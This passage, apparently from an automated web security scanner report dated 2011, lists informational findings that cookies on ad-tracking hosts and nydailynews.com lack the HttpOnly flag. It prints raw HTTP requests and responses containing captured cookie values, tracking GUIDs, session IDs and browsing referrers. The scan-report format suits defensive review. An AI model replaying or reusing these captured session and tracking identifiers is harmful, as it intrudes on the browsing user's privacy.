GET /serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1317129670_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 730

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCAB
...[SNIP]...

3.9. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?clicktrack=http://ib.adnxs.com/click%3FVyeY6uHHCUA3iUFg5dAGQAAAAAAAAABAUrgehetRDEAAAAAAAAAQQO2gY7wFMt4mcEeI8W8QIlnDzYFOAAAAABshCABlAQAA2AMAAAIAAAClbggAPWQAAAEAAABVU0QAVVNEACwB-gDbTNsERRABAgUCAQQAAAAAMB3WDwAAAAA./cnd=!BwXkKQjykwgQpd0hGL3IASAA/referrer=http%253A%252F%252Fwww.nypost.com/clickenc=http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLvQ0CMQwG0O_4U6Rbg9aSHRLZLliBHXJxUrMCk1FQX806iNe_FQuAa-tz5Fw7dRWhopXJg42KRItNS1euCYfHa_-sOP6HR-E5mUnFBoWNTJvYpFpcTbPe3CPhBOg94Yzl2xIuwPONHzTtG75zAAAA%2526dst%253D&tid=68326&type=mrect HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1317129670_1317129669033:1134794656352757; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1317129670; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 27 Sep 2011 13:21:10 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



3.10. http://rbc.bridgetrack.com/a/s/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbc.bridgetrack.com
Path:   /a/s/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/s/?BT_CON=51&BT_PID=676111&r=939827.4244740605 HTTP/1.1
Host: rbc.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.rbcroyalbank.com/personal.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; BTASES=SID=1EB144A14C9B484099AA2801367C2293; BTA3=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 297
Content-Type: application/x-javascript
Expires: Mon, 26 Sep 2011 13:27:29 GMT
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://rbc.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: AdData=S1C=2&S1T=201109270927290931&S1=26761z676111; expires=Wed, 28-Sep-2011 04:00:00 GMT; path=/
Set-Cookie: BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; expires=Fri, 21-Sep-2012 04:00:00 GMT; path=/
Set-Cookie: VCC3=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=1EB144A14C9B484099AA2801367C2293; path=/
Set-Cookie: ASB3=TX=1317130050&W=15191&Tr=15191&Cp=1023&P=676111&B=3&T=26191&Cr=26761&S=&Cn=51&Pd=0&SID=5E8E6E54C69249C5AD5F9864284CBBDC&Vn=837&Ct=0&Pc=0&Pb=268&A=8; expires=Wed, 12-Oct-2011 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:27:29 GMT

function BTWrite(s) { document.write(s); }
document.write('<A HREF=\'http://rbc.bridgetrack.com/ads_v2/img_click/?BT_BCID=50178&BT_SID=11885&\' target="_top"><IMG BORDER=0 SRC=\'http://rbc.bridgetrack
...[SNIP]...

3.11. http://rbc.bridgetrack.com/event/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbc.bridgetrack.com
Path:   /event/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/?type=-1&BTData=602127A716D617059534C47B9BEB5AAAC98958495FAFFF7EBEAC5C2DE2218BA3&BT_PUB=268&BT_VEN=732&BT_TRF=14941&r=[RANDOM] HTTP/1.1
Host: rbc.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.rbcroyalbank.com/products/deposits/index.html?tab=student_tab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA3=; AdData=S3C=1&S1C=1&S2=17857z358118&S2T=201109270927300056&S1T=201109270927280759&S1=26761z676111&S3T=201109270927310564&S3=22342z358571&S2C=1; BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; BTASES=SID=1EB144A14C9B484099AA2801367C2293; ASB3=TX=1317130052&Pb=268&A=8&SID=4C145C858BD147D19A49EB9951178C35&Vn=837&Ct=0&Pc=0&S=&Cn=51&Pd=0&T=35400&Cr=22342&W=12471&Tr=12471&Cp=919&P=358571&B=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Mon, 26 Sep 2011 13:28:01 GMT
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://rbc.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB3=TX=1317130081&W=0&Tr=14941&Cp=1005&P=647750&B=3&T=42016&Cr=24946&S=0&Cn=0&Pd=0&SID=39B422064E45441B8172B92278C3023E&Vn=732&Ct=0&Pc=0&Pb=268&A=0; expires=Wed, 12-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: VCC3=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=1EB144A14C9B484099AA2801367C2293; path=/
Set-Cookie: BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; expires=Fri, 21-Sep-2012 04:00:00 GMT; path=/
Set-Cookie: BTA3=GUID=B2552C6CD0734C04812CC2E94AB2D40C; path=/
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 13:28:01 GMT

GIF89a.............!.......,...........L..;

3.12. http://rbc.bridgetrack.com/track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbc.bridgetrack.com
Path:   /track/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/?id=3277&r=170506.9171730429 HTTP/1.1
Host: rbc.bridgetrack.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.rbcroyalbank.com/products/deposits/index.html?tab=student_tab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA3=GUID=B2552C6CD0734C04812CC2E94AB2D40C; BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; AdData=S4C=1&S2C=1&S3=22342z358571&S3T=201109270927310564&S1=26761z676111&S1T=201109270927280759&S2T=201109270927300056&S2=17857z358118&S1C=1&S4T=201109270928010383&S4=32684z647447&S3C=1; BTASES=SID=1EB144A14C9B484099AA2801367C2293; ASB3=TX=1317130081&W=18418&Tr=18418&Cp=1100&P=647447&B=3&T=48553&Cr=32684&S=&Cn=51&Pd=0&SID=3AC710668A044D8AAED7FAF9993D0D92&Vn=732&Ct=0&Pc=0&Pb=268&A=8

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Mon, 26 Sep 2011 13:28:04 GMT
Server: Microsoft-IIS/7.0
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://rbc.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: BTASES=SID=1EB144A14C9B484099AA2801367C2293; path=/
Set-Cookie: BTA=GUID=B2552C6CD0734C04812CC2E94AB2D40C; expires=Fri, 21-Sep-2012 04:00:00 GMT; path=/
Set-Cookie: BTA3=GUID=B2552C6CD0734C04812CC2E94AB2D40C; expires=Fri, 21-Sep-2012 04:00:00 GMT; path=/
Date: Tue, 27 Sep 2011 13:28:03 GMT

GIF89a.............!.......,...........L..;

3.13. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104420&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&cwr=&mrnd=44712826&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1317129762831&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; cw=cw; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; FC1-WCR=132981_1_3Ilow^132982_1_3Iloz; vf=2; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3340
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:22:28 GMT
Connection: close
Set-Cookie: 537740_4_104420_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59371_6_3IloC^59755_1_3IloF^58230_1_3KwfX^59372_1_3IloF; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: FC1-PCC=6081_3HZ4N; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: FC1-WCC=5995_1_3HZRb; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: FC1-WCR=132981_1_3Ilow^132982_3_3Iloz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:27 GMT; Path=/
Set-Cookie: vf=4; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70287%26type%3Dlea
...[SNIP]...

3.14. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104419&cn=1&epid=&esid=&cf=300X250&rq=1&dw=1241&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&cwr=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&mrnd=94800823&if=0&tl=1&pxy=&cxy=1225,3244&dxy=1225,3244&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/gossip/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; cw=cw; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; FC1-WCR=132981_2_3Ilow^132982_2_3Iloz; vf=4

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3343
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:22:31 GMT
Connection: close
Set-Cookie: 537740_3_104419_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WCR=132981_3_3Ilow^132982_2_3Iloz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:30 GMT; Path=/
Set-Cookie: vf=5; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70289%26type%3Dmre
...[SNIP]...

3.15. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104419&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&cwr=&mrnd=11911947&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_atf?t=1317129766295&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fgossip%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; cw=cw; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; FC1-WCR=132981_1_3Ilow^132982_2_3Iloz; vf=3

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3342
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:22:31 GMT
Connection: close
Set-Cookie: 537740_3_104419_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59371_6_3IloC^59755_1_3IloF^58230_1_3KwfX^59372_1_3IloF^56557_1_3Ilpz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: FC1-PCC=6081_3HZ4N; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: FC1-WCC=5995_1_3HZRb; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: FC1-WCR=132981_3_3Ilow^132982_2_3Iloz; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:22:31 GMT; Path=/
Set-Cookie: vf=5; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70289%26type%3Dmre
...[SNIP]...

3.16. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=537740&ct=104418&cn=1&epid=&esid=&cf=160X600&rq=1&dw=160&cwu=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&cwr=&mrnd=24548929&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/301
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 3519
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:24 GMT
Connection: close
Set-Cookie: 537740_2_104418_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WCR=132980_2_3Ilow; Domain=.contextweb.com; Expires=Fri, 27-Sep-2041 09:21:23 GMT; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Wed, 28-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20language%3D%27javascript%27%20type%3D%27text%2Fjavascript%27%20src%3D%27http%3A%2F%2Fimp.fetchback.com%2Fserve%2Ffb%2Fadtag.js%3Ftid%3D70288%26type%3Dwid
...[SNIP]...

3.17. http://www.nydailynews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698; __utma=263866259.366694639.1315773952.1315773952.1317129675.2; __utmb=263866259.1.10.1317129675; __utmc=263866259; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvqD%3DT

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:20:05 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2007 14:31:37 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=14515200
Expires: Tue, 13 Mar 2012 13:20:05 GMT
Keep-Alive: timeout=3, max=1000
Content-Type: image/x-icon
Content-Language: en
Age: 62
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BPACAKAK; Expires=Tue, 27-Sep-2011 02:15:53 GMT; Path=/

............ .h.......(....... ..... ............................................................................................&...u...uTT..TT..TT..TT..TT..TT..TT..TT..TT..TT.....u...........2......
...[SNIP]...

3.18. http://www.nydailynews.com/gossip/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /gossip/index.html

Issue detail

